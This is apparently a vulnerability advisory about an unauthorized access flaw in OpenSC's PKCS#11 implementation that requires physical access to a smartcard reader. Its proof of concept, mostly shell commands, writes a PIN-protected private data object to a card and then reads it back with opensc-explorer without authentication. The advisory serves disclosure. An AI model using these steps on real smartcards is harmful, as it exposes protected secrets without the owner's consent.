OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability
Attackers would need physical access to the smartcard reader.

The following proof of concept is available:

Create a file with a secret:

    echo "This is my secret data" > secret-file

To initialise a blank card:

    pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890

To write a private data object to the card:

    pkcs11-tool --label "my secret" --type data --write-object secret-file --private --login --pin 123456

To see all objects on the card:

    pkcs15-tool --dump

This will list the data object, including the path where it is stored, e.g.:

    Path: 3f0050154701

To access such an object with low-level tools:

    opensc-explorer
    cd 5015
    get 4701